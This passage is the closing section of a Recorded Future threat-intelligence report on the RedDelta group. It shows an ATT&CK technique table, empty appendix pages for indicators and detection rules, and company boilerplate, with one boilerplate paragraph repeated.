organizations, NGOs, and activists. As demonstrated in this report, RedDelta has continually evolved its infection chain and is anticipated to continue doing so in the future in close proximity to or in anticipation of major geopolitical developments. 20 CTA-CN-2025-0109 Recorded Future[®] [| www.recordedfuture.com](http://www.recordedfuture.com) ----- ## Appendix A — Indicators of Compromise 21 CTA-CN-2025-0109 Recorded Future[®] [| www.recordedfuture.com](http://www.recordedfuture.com) ----- 22 CTA-CN-2025-0109 Recorded Future[®] [| www.recordedfuture.com](http://www.recordedfuture.com) ----- 23 CTA-CN-2025-0109 Recorded Future[®] [| www.recordedfuture.com](http://www.recordedfuture.com) ----- 24 CTA-CN-2025-0109 Recorded Future[®] [| www.recordedfuture.com](http://www.recordedfuture.com) ----- 25 CTA-CN-2025-0109 Recorded Future[®] [| www.recordedfuture.com](http://www.recordedfuture.com) ----- 26 CTA-CN-2025-0109 Recorded Future[®] [| www.recordedfuture.com](http://www.recordedfuture.com) ----- 27 CTA-CN-2025-0109 Recorded Future[®] [| www.recordedfuture.com](http://www.recordedfuture.com) ----- 28 CTA-CN-2025-0109 Recorded Future[®] [| www.recordedfuture.com](http://www.recordedfuture.com) ----- ## Appendix B — MITRE ATT&CK Techniques |Appendix B — MITRE ATT&CK Techniques|Col2| |---|---| |Tactic: Technique|ATT&CK Code| |Resource Development: Acquire Infrastructure — Virtual Private Server|T1583.003| |Resource Development: Acquire Infrastructure — Domains|T1583.001| |Initial Access: Phishing — Spearphishing Attachment|T1566.001| |Initial Access: Phishing — Spearphishing Link|T1566.002| |Execution: User Execution — Malicious File|T1204.002| |Execution: Command and Scripting Interpreter — PowerShell|T1059.001| |Persistence: Boot or Logon Autostart Execution — Registry Run Keys / Startup Folder|T1547.001| |Defense Evasion: Hijack Execution Flow — DLL Search Order Hijacking|T1574.001| |Defense Evasion: Execution Guardrails — Geofencing|T1627.001| |Defense Evasion: Deobfuscate/Decode Files or Information|T1140| |Defense Evasion: System Binary Proxy Execution — MMC|T1218.014| |Defense Evasion: System Binary Proxy Execution — Msiexec|T1218.007| |Defense Evasion: Masquerading — Match Legitimate Name or Location|T1036.005| |Defense Evasion: Masquerading — Double File Extension|T1036.007| |Discovery: System Information Discovery|T1082| |Command-and-Control: Encrypted Channel — Symmetric Cryptography|T1573.001| |Command-and-Control: Data Encoding: Standard Encoding|T1132.001| |Command-and-Control: Web Service|T1102| 29 CTA-CN-2025-0109 Recorded Future[®] [| www.recordedfuture.com](http://www.recordedfuture.com) ----- ## Appendix C — YARA and Sigma Rules 30 CTA-CN-2025-0109 Recorded Future[®] [| www.recordedfuture.com](http://www.recordedfuture.com) ----- 31 CTA-CN-2025-0109 Recorded Future[®] [| www.recordedfuture.com](http://www.recordedfuture.com) ----- 32 CTA-CN-2025-0109 Recorded Future[®] [| www.recordedfuture.com](http://www.recordedfuture.com) ----- _Recorded Future reporting contains expressions of likelihood or probability consistent_ _[with US Intelligence Community Directive (ICD) 203: Analytic Standards (published](https://irp.fas.org/dni/icd/icd-203.pdf)_ _January 2, 2015). Recorded Future reporting also uses confidence level standards_ _[employed by the US Intelligence Community to assess the quality and quantity of the](https://www.dni.gov/files/ODNI/documents/assessments/ICA-declass-16MAR21.pdf)_ _source information supporting our analytic judgments._ _About Insikt Group[®]_ _Recorded Future’s Insikt Group, the company’s threat research division, comprises_ _analysts and security researchers with deep government, law enforcement, military, and_ _intelligence agency experience. Their mission is to produce intelligence that reduces risk_ _for customers, enables tangible outcomes, and prevents business disruption._ _About Recorded Future[®]_ _Recorded Future is the world’s largest threat intelligence company. Recorded Future’s_ _Intelligence Cloud provides end-to-end intelligence across adversaries, infrastructure,_ _and targets. Indexing the internet across the open web, dark web, and technical_ _sources, Recorded Future provides real-time visibility into an expanding attack surface_ _and threat landscape, empowering customers to act with speed and confidence to_ _reduce risk and securely drive business forward. Headquartered in Boston with offices_ _and employees around the world, Recorded Future works with over 1,800 businesses_ _and government organizations across more than 75 countries to provide real-time,_ _unbiased, and actionable intelligence._ _reduce risk and securely drive business forward. Headquartered in Boston with offices_ _and employees around the world, Recorded Future works with over 1,800 businesses_ _and government organizations across more than 75 countries to provide real-time,_ _unbiased, and actionable intelligence._ _Learn more at recordedfuture.com_ 33 CTA-CN-2025-0109 Recorded Future[®] [| www.recordedfuture.com](http://www.recordedfuture.com) -----